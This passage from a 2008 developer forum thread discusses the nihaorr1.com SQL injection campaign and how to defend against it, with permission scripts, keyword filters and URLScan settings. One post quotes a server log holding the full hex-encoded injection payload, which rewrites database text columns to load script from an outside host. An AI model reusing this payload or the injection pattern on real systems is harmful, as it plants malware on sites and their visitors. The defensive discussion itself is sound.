    Neil
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 12, 2008 12:32 PM|DavidReabow|LINK

    Hi Neil,

    I'm not sure if I am reading your last post correctly. Are you saying that you are using Parameter Objects and it is still getting through?

    If you are just appending your parameters to the string as in my example it doesn't matter what the SP parameter is declared as.

    In my example:  'EXEC usp_GetProductDetail 1 Drop Table tblProducts'  only the "1" is actually passed to the stored procedure. The "Drop Table tblProducts" part is not passed to the SP but executed as a seperate statement. The fact that it is on the same line does not mean that it is all part of the same statement.

    Even if the SP was created as follows:

    CREATE PROCEDURE usp_GetProductDetail
            @ProductID nvarchar(1000)
    AS
    .......

    "Drop Table tblProducts" will not be passed to the SP.

     

    I hope this helps.

    David

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 12, 2008 01:09 PM|neilredfern|LINK

    David,

    Thanks for the update that makes sense now.

    What I was trying to say rather badly is I spend 95% of my time developing in ASP.Net where we always use parameters and tell ADO.Net that we are calling a stored procedure, so I'm not used to having to deal with this sort of code.

    Thanks

     
    Neil
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 12, 2008 01:18 PM|pb_aldea|LINK

    Greetings members,

    Since saturday May 10, 2008 there is another version/attempt to inject code into databases through malformed query strings.

    New destination for the javascript call is wowgm1.cn/m.js (include www. before)

    The infection they try to spread is a version of Vundo/N

    60.169.3.130 is the source of the attack.

    Of course, is a China assigned IP

    Best regards, good luck!

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 03:59 AM|Flackie|LINK

    greenlit_design

    1) First to prevent script from executing or any further issues:

    deny select on sysobjects to sql_login_of_your_app
    deny select on syscomments  to ql_login_of_your_app
    deny select on syscolumns  to ql_login_of_your_app
    deny select on systypes  to ql_login_of_your_app

    The script won't even get access to the sys tables anymore (you can add more but these are the minimum)

    I found this thread as we've also experienced the problem. But I cannot seem to get these permissions to change. I connect to the SQL db with windows authentication on the server itself, logged in as an admin. But when I try to change the permissions I get:

     Msg 15151, Level 16, State 1, Line 2
    Cannot find the user 'username', because it does not exist or you do not have permission.

     The username in question does exist, I have tried this on several of the dbs and same error each time. So it seems my admin account does not have permission to deny select permissions for some users. Is that possible?

     I also tried changing the public role to deny access as all the I_USR accounts are set as public (I was clutching at straws here, so maybe this is not even valid sql commands):

    deny select on sysobjects to public
    deny select on syscomments  to public
    deny select on syscolumns  to public
    deny select on systypes  to public

    This does not give an error. But it apparently does nothing since when I try running a query to list sysobjects in my web back end on the site in question, i can still get a full list of all the tables etc.

    I am not a database pro, I am a vb coder, so apologies if I come across as not really knowledgeable about the intricacies of MS SQL. I am well aware of what SQL injection is, our own sites have not been breached yet, but I don't want to take our coding resistance to injection for granted and so desperately want to tighten up the db too. This forum is the closest I have come to a practical solution to patching this problem at the database and I suspect I am probably not the only lurker who found this thread and is anxious to get the db locked down a bit.

    I was rather hoping MS might produce some simple security guidance as it seems yet again it is their platform in the crosshairs (i.e. a quick bit of SQL code as above maybe). I have trawled their site but as usual find their MSDN articles impenetrable in the extreme and have ended up googling in the hope I can find something that is simple to understand, run and verify that it is working.

     Any advice appreciated.

     

    --
    http://www.kartris.com
    Free GPL v2 open source VB shopping cart
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 08:22 AM|eftennis|LINK


    I had the same problem with denying select permission to my sys tables.   I ended up going to my hosting provider and their sql admin gave me this script.   This worked and allowed me to deny my asp login account from selecting the sys objects table.

    use [my_admin_sql_login]
    GO
    DENY SELECT ON [sys].[sysobjects] TO [my_asp_sql_login]
    GO

    As you can see, I set up a separate login account for my asp connection.  Hope this helps.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 08:27 AM|DavidReabow|LINK

    Hi Flackie,

    Use an account with sysadmin or DBO access rights to change them, it should work.

    The following should do the job:

    use [YourDBName]
    GO

    DENY SELECT ON [sys].[tables] TO [YourUserName]
    GO
    DENY SELECT ON [sys].[columns] TO [YourUserName]
    GO

    A further note to those using this method to stop this particular attack, I have had a SQL 2000 database attacked as well. This implies that there may also be a variant of this getting table and column info from the INFORMATION_SCHEMA views. These views are available on SQL 2000 and 2005 and you should probably deny Select permissions on these as well. 

    And lastly, Denying access to these Views may stop this particular attack but it doesn't close the holes in your websites code. Anyone searching for this attack on google, apon spotting your site will know that you are vulnerable to a SQL Injection attack and can attack you in many other ways. You need to fix the code!!!!

    David

     

     

     

     

     

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:02 AM|Flackie|LINK

     Thanks for the feedback and suggestions. I have tried these, but still with the same error. I am logged into the remote server on Remote Access, and then open up the SQL Management interface with windows authentication. I am logged into the server as a server admin, and assumed I have admin access therefore to the MS SQL server. IS there a way to check this, like some SQL i can run to say "yes, you do have admin rights"? Otherwise i might be barking up the wrong tree with this one.

    On a brighter note, our application it seems was not the entry point for the client in question. We analysed his logs of the site running our app and found nothing but he looked at some others and found it was another script he had written about 2 years ago on another domain. Our application was written quite carefully, we paid a lot of attention to closing SQL injection holes, but I'd like to lock down the SQL anyway as an extra precaution.

     

     

    --
    http://www.kartris.com
    Free GPL v2 open source VB shopping cart
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:10 AM|Flackie|LINK

    eftennis

    use [my_admin_sql_login]
    GO
    DENY SELECT ON [sys].[sysobjects] TO [my_asp_sql_login]
    GO

    As you can see, I set up a separate login account for my asp connection.  Hope this helps.

     

    I get another error... i put the SQL admin user where you have my_admin_sql_login, and it says:

    "Could not locate entry in sysdatabases for database 'sa'. No entry found with that name. Make sure that the name is entered correctly."

     So it thinks I am entering a db name, not a username. I notice that the response after yours showed a DB name in this gap. So I am a bit more confused now!

     

    --
    http://www.kartris.com
    Free GPL v2 open source VB shopping cart
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:13 AM|DavidReabow|LINK

    Replace [my_asp_sql_login] with the login that your website uses to connect to the database (not the admin account you are using)

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:18 AM|Flackie|LINK

    DavidReabow

    Replace [my_asp_sql_login] with the login that your website uses to connect to the database (not the admin account you are using)

     

    Yes I did... my point of confusion was the first line where you had my_admin_sql_login - the error message (and the post subsequent to yours) suggested that should be the database name, not the admin username.

    --
    http://www.kartris.com
    Free GPL v2 open source VB shopping cart
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:20 AM|DavidReabow|LINK

    Yes, thats an error [my_admin_sql_login] should actually be the name of the database.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:31 AM|Flackie|LINK

     Ok I think i got it working (for one site anyway, others should be simple now). I ended up creating a new admin login for myself and then using that to go into the SQL management so i knew i had full admin rights. I made sure I gave myself permissions for all the sites I need to change and then ran the code and it worked without error.

    I then made sure it worked and does deny access by running this using the web back end of the site (which uses the ASP user account for this site):

    SELECT * from sysobjects

    Previously this returned full results, now it returns nothing - so that seems to be job done as far as this part goes.

    Thanks eftennis and davidreabow for your comments, these helped me greatly.

     

    --
    http://www.kartris.com
    Free GPL v2 open source VB shopping cart
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 09:53 AM|DavidReabow|LINK

    The person(s) behind this appears to realise that he/she/they need to adapt as measures are taken to prevent these attacks. I wouldn't rely on any one single method to stop this and I wouldn't be surprised if it's back again soon in a different guise.

    Check all input from your websites (URL parameters, Form data, cookie data etc) 

    Close up the holes in the code that allows this through. (Use parameter objects)

    Revoke all unnecessary permissions (sys.Tables, syscolums, syscomments, INFORMATION_SCHEMA views etc)

    Do not allow your website user accounts to make schema changes.

    Do not allow your websites access to your databases with sysadmin or DBO rights.

     

    There are probably more things that I've missed but this is a good start and I've rarely seen a site that has done all this. 

     Hope this helps.

     David

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 11:09 AM|greenlit_design|LINK

    Hi, A Sys Admin account in MS SQL give you access to all databases and gives you all privileges. So basically you don't need any other rights. I'm not sure if a Windows Admin account has admin right in MS SQL. I believe you need to add the Windows Account to MS SQL and grant that account proper permissions. If you were able to create a new sql login with SysAdmin privileges, then you probably had SysAdmin. Each database has a "permission admin" role which allow a sql user to grant permission. Remember, a sql login grant access at the database level (except for server roles like sysAdmin). You need to grant that sql login access to each database you want that sql login to access to. If you grant DBO rigth to a sql login to a database, that sql login becomes a user in the database. DBO rights is the highest level in a database (not database server). So you'll get creater, alter, grant, select etc... for all DB objects (view, stored proc, etc...). Security in MS SQL can get complicated. That's why it's important to involve a DBA when you're not sure. People tend to grant DBO rights because it's the easiest way. You then pay the price later. Luckily the script did not try to create tables, stored proc... Dont hesitate if you have questions

    Flackie

     Ok I think i got it working (for one site anyway, others should be simple now). I ended up creating a new admin login for myself and then using that to go into the SQL management so i knew i had full admin rights. I made sure I gave myself permissions for all the sites I need to change and then ran the code and it worked without error.

    I then made sure it worked and does deny access by running this using the web back end of the site (which uses the ASP user account for this site):

    SELECT * from sysobjects

    Previously this returned full results, now it returns nothing - so that seems to be job done as far as this part goes.

    Thanks eftennis and davidreabow for your comments, these helped me greatly.

     

    Sql injection filter MS SQL security sql login

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 13, 2008 11:50 AM|DavidReabow|LINK

    I've been looking for a good tutorial on using parameters to pass on to some developers and found this:

    http://weblogs.sqlteam.com/jeffs/archive/2006/07/21/10728.aspx

    Everyone should use parameter objects whether you use stored procedures or not. It is probably one of the most important things to do when protecting yourself from SQL Injection.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 14, 2008 03:13 AM|csraodel|LINK

     

    Do a complete server side data validation on your forms.

    validation

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 15, 2008 06:12 AM|drors01|LINK

    Hi,

    I  added the url filter to my site just in case...

    But then I started getting too many false alarms due to google's search.
    I is doing many sorts of phrases that include many of the words that are notallowed.

    So I made a change to the verify function

    function verify(s)
     
     'convert the querystring to lowercase
     s = lcase(s)
     risk_level_counter = 0

     ' badwords - a list of disallowed keywords in the url
     badwords= "select 1=1 insert update delete drop -- table alter cast declare convert exec chr( union"

     ' create an array list of each back word
     r = split(badwords, " ")
     
     ' loop through the bad words and return false if it is present.
       for i =0 to ubound(r)
        if instr(s, r(i)) > 0 then
      risk_level_counter = risk_level_counter + 1
        end if
       next

      if risk_level_counter >= 2 then
      verify = false
      else
      verify=true
      end if

    end function

    I think that I am going to give a uniqe level of risk to each word, for instance giving 3 for DECLARE, UPDATE , DROP and a level of 1 to select.

    I would also combine the checks with the length of the string not allowing more than 150 characters for a known need.

    Thanks

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 15, 2008 07:28 AM|DavidReabow|LINK

    Hi everyone,

     I'm going to suggest an alternative to the "find bad words and redirect" solution. This may not work for everyone but will hopefully break any attempts to inject SQL.

     You should still search for the "bad" words but when you find them, instead of redirecting to another page, you should replace them with the same word and a character.

    So if you find the words "Select" or "Declare", simply replace them with "Select," or "Declare,". By inserting a "," it should be sufficient to break the sql statement and not allow it to run.

    This should also help where sites do pass valid text data that may contain these words.

     Replace "--" with "-,-". This will break the comment.

    Also if valid data is identified as a false positive, rather than redirecting your user it just looks like a "typo" error if the data is stored and displayed.

    This will also be friendly towards things like fulltext searches.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 16, 2008 01:08 PM|DavidReabow|LINK

    Hi all,

    Here are some "DENY" permission scripts I have used. I'd advice you to check that they don't break your applications/websites before using them.

     

     

    -------------------------------------------------------------------------------------- Master -------------------------------------------------------------------------------------------

    use [Master]

    GO

    DENY SELECT ON [INFORMATION_SCHEMA].[TABLES] TO [Public]

    DENY SELECT ON [INFORMATION_SCHEMA].[COLUMNS] TO [Public]

    DENY SELECT ON [INFORMATION_SCHEMA].[VIEW_COLUMN_USAGE] TO [Public]

    DENY SELECT ON [INFORMATION_SCHEMA].[CONSTRAINT_COLUMN_USAGE] TO [Public]

    DENY SELECT ON [INFORMATION_SCHEMA].[COLUMN_PRIVILEGES] TO [Public]

    GO

    -------------------------------------------------------------------------------------- Your Database --------------------------------------------------------------------------------

    use [Your_Database_name]

    GO

    DENY SELECT ON [sys].[columns] TO [Your_User]

    DENY SELECT ON [sys].[tables] TO [Your_User]

    DENY SELECT ON [sys].[syscolumns] TO [Your_User]

    DENY SELECT ON [sys].[sysobjects] TO [Your_User]

    DENY SELECT ON [sys].[objects] TO [Your_User]

    DENY SELECT ON [sys].[syscomments] TO [Your_User]

    GO

     

    I have also revoked all insert/update/delete permission from tables where the account does not need them. 

    You may also want to deny permission on CREATE statements.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 18, 2008 06:08 PM|lillyg|LINK

    Would it work to use the CInt function to test the ID that's passed to confirm that it is an integer between -32767 and 32767?  It seems like that would force an error given the length and alpha characters that are in the script.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 18, 2008 06:38 PM|DavidReabow|LINK

    Hi Lilly,

    I would still suggest using parameter objects. There are two main reasons for this;

    1. You can set the data type of the parameter object and achieve the same "error checking" as you would with CInt.

    2. SQL Server treats parameters slightly different to executing a single "string" statement. When a string is executed it is first interpreted or it has to be "prepared" by SQL server for execution and any mal formed character strings that can be interpreted as executable will be executed. When parameter are passed into a statement they are treated a parameters and mal formed data is not executed.

     

    This takes care of the interface between your development language and SQL Server. I have seen Stored Procedures that take character strings and within the stored procedure build Dynamic SQL statments. If anyone is doing this you are in danger of being attacked the same way within your SP. This is particularly true where the SP accepts large character strings. To fix this you can also use parameters within TSQL (also known as prepared statements).

    I know it isn't always possible as some applications will have to accept long strings but where possible you should also limit the length of your character data.

    A combination of many of the previously mentioned solutions would be best. All you really need to achieve is to "break" the execution of the malicious code. Some people have mentioned detecting specific strings from this attack and acting on that. The problem with this approach is that the attacker could easily change something, All he/she/they need to do is add an extra %20 and your detection will fail. 

    I still believe that one of the most important things is to use parameter objects at your code level and paremeters (prepared statements) within your SP's.

    Regards

    David

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 20, 2008 01:03 AM|wistex42|LINK

    In my situation, most of the input should not have a ' or a ; in it at all, so I just filter that out completely when those characters are not expected.  I place an include with the following code at the top of almost every page.

    <%
    str = request.servervariables("QUERY_STRING")
    if instr(str, ";") then response.redirect("/404msg.asp")
    str = Request.Form
    if instr(str, ";") then response.redirect("/404msg.asp")

    str = request.servervariables("QUERY_STRING")
    if instr(str, "--") then response.redirect("/404msg.asp")
    str = Request.Form
    if instr(str, "--") then response.redirect("/404msg.asp")

    str = request.servervariables("QUERY_STRING")
    if instr(str, "'") then response.redirect("/404msg.asp")
    str = Request.Form
    if instr(str, "'") then response.redirect("/404msg.asp")
    %>

    This won't work for everyone, but if you know for sure that a ' or ; or a -- should not be in the input, just kill it before it goes anywhere. 

    This code checks both GET and POST (i.e. parameters in the URL or submitted from a form) and can be used as a preemptive filter before it even gets to the rest of the code.

    Obviously this is not the only thing you should do, but it may be a quick way to kill certain attacks.  Combine this with proper sanitizing of variables, and it makes your site more difficult to attack.
     

    lillyg

    Would it work to use the CInt function to test the ID that's passed to confirm that it is an integer between -32767 and 32767?  It seems like that would force an error given the length and alpha characters that are in the script.

     

    That should definitely be used for checking integers.  But depending on the application, not all parameters may be integers.


     

    sql injection injection filter code asp cint integers

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 21, 2008 10:08 PM|ejhay|LINK

     

    Hi, Im a System Administrator of a Hosting Company and one of our website has been hack with SQL injection, At first the hacker inserted nihaorr1.com/1.js most of the website table are being affected with this attacked, after I created that a created a SQL validation like one that you have posted in this forum unfortunately  the hacker  inserted again a  malicious URL on the MS SQL database what I did is I include the validation for all database driven pages to make the website secured but at this time the hacker can insert the script again and again. I think the hacker is using a problem that you executing this kind of hacking activity. please advise what else can I do with this problem. thanks

    security risks ASP sql injection nihaorr1.com asp code to filter sql injection validation sql injection injection filter code asp cint integers

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 21, 2008 10:11 PM|ejhay|LINK

     

    Hi, Im a System Administrator of a Hosting Company, and one of our website has been hacked with SQL injection, At first the hacker inserted nihaorr1.com/1.js most of the website table are being affected with this attacked, after that incident I developed a SQL validation that is similar on the asp script that you posted in this forum unfortunately  the hacker  inserted again a  malicious URL on the MS SQL database what I did is I include the validation for all database driven pages to make the website secured but at this time the hacker can insert the script again and again. I think the hacker is using a problem that you executing this kind of hacking activity. please advise what else can I do with this problem. thanks

    security risks ASP sql injection nihaorr1.com asp code to filter sql injection validation sql injection injection filter code asp cint integers

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Jun 05, 2008 01:06 AM|silkyfixer|LINK

    i have had a run in with this injection and i have created serveral scripts to clean a database of injection as long as it has not truncated over data. if people need help hit me up.

     

    silkyfixer

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Jun 05, 2008 01:07 AM|silkyfixer|LINK

    oh and i can fix your poorly coded asp pages that are causing it to happen too.

     

     S.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Jun 09, 2008 12:30 PM|racekites|LINK

    does anyone know if the SQL string can contain web encoded characters ?

    a dash "-" can also be &#107; does SQL Server know what to do with this or will it throw an error ?

    Cheers

     

     

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Jun 20, 2008 05:02 PM|wybnormal|LINK

    You can stop the SQL attacks with an ISPI filter called "WebKnight" which is a freebie. It will among other things, watch for the string length on the forms and if it exceeds X number of characters, it blocks it. It will also look for embedded commands etc. This has stopped the attacks against our servers for the past three weeks. The company name is "Aqtronix" http://www.aqtronix.com/?PageID=99

    filter webknight sql injection attack block firewall isapi

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 11, 2008 05:55 AM|kimrennin|LINK


    The number of infected Web pages spiked to 282,000 in the past day, and appears to be growing. Network managers can check to see whether their Web pages are infected with the iFrame code by looking for a specific code string in the source code of the Web page associated to an iFrame tag. The string is <script src=http://www.nihaorr1.com/1.js>, according to the security vendor.The worst part of it all is that these infestations are not in seamy Web sites, they are taking place in legitimate Web pages. An IFRAME redirects the user to another page, where identity-stealing malware is downloaded onto their computer. So even users who think they are staying clean are not safe. The malicious page scans the visitors machine to find ways to compromise the visitors machine. Exploits are then downloaded and used to infected the redirected visitor based on the
    information found on the scan.

    ---------------------------

    kimrennin



    WideCircles

     



  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 21, 2008 06:43 AM|steve schofield|LINK

    URLScan 3.0 was released to help with these types of automated attacks.

    http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 21, 2008 11:28 PM|silkyfixer|LINK

    well one sneaked through my urlscan 3.0 i am still trying to figuare out how they got past the declare statement. can you post your config ?

     

    silkyfixer

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 12:19 AM|steve schofield|LINK

    Do you have the IIS logs entry that shows the one that squeeked through?

    http://www.iislogs.com/urlscan.txt is my config.

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 11:38 AM|silkyfixer|LINK

    my problem is that i have various websites that connect to the same database i need some sort of trigger that catches the update on the database with a <script in the update and tell me what site it came from. i have sanatized most of my code as well but every 2-3 weeks 1 of my databases still gets infected.

    would you have a trigger script i could install globaly on my sql server ?

    thanks

    silkyfixer

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 11:44 AM|silkyfixer|LINK

    i found this for today in my logs i noticed my database was infected this morning. happend last night this is the only declare in my log i wonder if they are using something else other than declare

    GET /index.asp ;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); 80 - 65.96.169.213 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+.NET+CLR+3.0.04506.648;+.NET+CLR+3.5.21022) - - 200 0 0 34770 1607 9765

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 12:14 PM|steve schofield|LINK

    What is your urlscan.ini setup to look for.

    [SQL Injection Raw]
    AppliesTo=.asp,.aspx

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 01:20 PM|silkyfixer|LINK

    [Options]
    UseDenyVerbs=1
    UseDenyExtensions=1
    NormalizeUrlBeforeScan=0
    VerifyNormalization=0
    AllowHighBitCharacters=1
    AllowDotInPath=1
    RemoveServerHeader=0
    EnableLogging=1
    PerProcessLogging=0
    AllowLateScanning=0
    PerDayLogging=1
    UseFastPathReject=0
    LogLongUrls=0
    UnescapeQueryString=1
    RejectResponseUrl=
    LoggingDirectory=Logs
    AlternateServerName=
    RuleList=Edge

    [Edge]
    AppliesTo=.asp,.aspx,.inc
    DenyDataSection=Edge Data
    ScanURL=0
    ScanAllRaw=0
    ScanQueryString=1
    ScanHeaders=

    [Edge Data]
    declare
    DECLARE
    cursor
    CURSOR

    [AllowVerbs]
    GET
    POST
    HEAD

    [DenyVerbs]
    PROPFIND
    CONNECT

    [DenyExtensions]
    .bat
    .cmd

    [DenyQueryStringSequences]
    <
    >

    if i try to use some of the ones i find on the net it breaks most of my sites.

    thanks for your time

     

    silkyfixer

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 01:25 PM|silkyfixer|LINK

    here is a snibblet from the log of the urlscan you can see it kicks out the declare so how did it sneak through ? i have about 500 websites that connect to the database so its hard to pinpoint were or how it gets through

     

    [08-22-2008 - 11:41:59] Client at 80.99.117.220: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 11:46:44] Client at 189.46.158.208: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp'
    [08-22-2008 - 12:05:47] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:05:48] Client at 189.129.167.129: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:13:54] Client at 59.29.234.153: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:20:58] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:20:59] Client at 201.170.148.3: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp'
    [08-22-2008 - 12:32:01] Client at 189.24.155.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:37:57] Client at 189.149.188.56: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:39:22] Client at 201.34.214.205: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:39:45] Client at 85.99.42.197: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 12:43:10] Client at 124.121.28.118: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m-webtv.asp'
    [08-22-2008 - 12:49:21] Client at 201.211.113.200: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp'
    [08-22-2008 - 12:58:06] Client at 122.168.200.189: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 13:04:54] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp'
    [08-22-2008 - 13:05:58] Client at 122.163.163.163: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/m.asp'
    [08-22-2008 - 13:08:22] Client at 190.19.198.60: Rule 'Edge' detected string 'declare' in the query string. Request will be rejected.  Site Instance='1489121054', Raw URL='/y.asp'
    [08-22-2008 - 13:19:44] Client at 195.225.178.21: QueryString contains sequence '%%3C', which is disallowed. Request will be rejected.  Site Instance='1643931472', Raw URL='/AddReview.asp', QueryString='txtName=Cialis&txtLocation=PaokyMzP&txtCmnts=Nise+site.%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.partyvibe.com%%2Fvbulletin%%2Fmember.php%%3Fu%%3D23082%%22%%3ECialis+kaufen%%3C%%2Fa%%3E%%2C++%%25DD%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EValium+online%%0D%%3C%%2Fa%%3E%%2C++5776%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fclaytonwilliams.html%%22%%3ETramadol%%3C%%2Fa%%3E%%2C++54245%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fvbulletin.thesite.org%%2Fmember.php%%3Fu%%3D31710%%22%%3Eviagra%%3C%%2Fa%%3E%%2C++renuiq%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fkeithbreunig.html%%22%%3EAmbien%%3C%%2Fa%%3E%%2C++nvnti%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fboard.muse.mu%%2Fmember.php%%3Fu%%3D98088%%22%%3EBuy+Tramadol+online%%0D%%3C%%2Fa%%3E%%2C++tbsvm%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fwww.newmediamedicine.com%%2Fforum%%2Fmembers%%2Fsamuelbooker.html%%22%%3EDiazepam%%3C%%2Fa%%3E%%2C++ivbp%%2C+%%3Ca+href%%3D%%22http%%3A%%2F%%2Fcommunity.fotopic.net%%2Fuser%%2Fyyogml.html%%22%%3ECheap+Valium%%3C%%2Fa%%3E%%2C++1672%%2C+&escid=1010'

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 04:22 PM|steve schofield|LINK

    If you are running the rtw version of URLScan3, the logs are w3c complient and you can use log parser against it.  Also, in the logs you posted, have the SITEID property.  That way would help narrow down which requests being blocked.

    you could select the s-siteid property.  You could sort it by ID ascending then compare.  That is one way off-hand if you have a lot of sites hiting the db. 

    http://blogs.iis.net/nazim/archive/2008/08/19/urlscan-v3-0-rtw-released.aspx

    Another way would be to create a log parser script that goes through your w3svc files and pipes the data to an external file.  When hunting and pecking like this, copying the affected files to a separate location and hitting with log parser is effective.  You could have a recursive script copy the log to a single location then hit with log parser.  Hope that helps.

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Aug 22, 2008 06:22 PM|silkyfixer|LINK

    when this first happend to me last year befor the massive web attack i copied all the log files to my unix box and i used grep to parse through the files. it took me a while to pin point the injection since it was not in the wild at the time. I had coder write a decrypt script to decode the hex

    #!/usr/bin/perl

    my $s=<<"EOF";
    4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F72204355
    52534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E732062205748
    45524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220
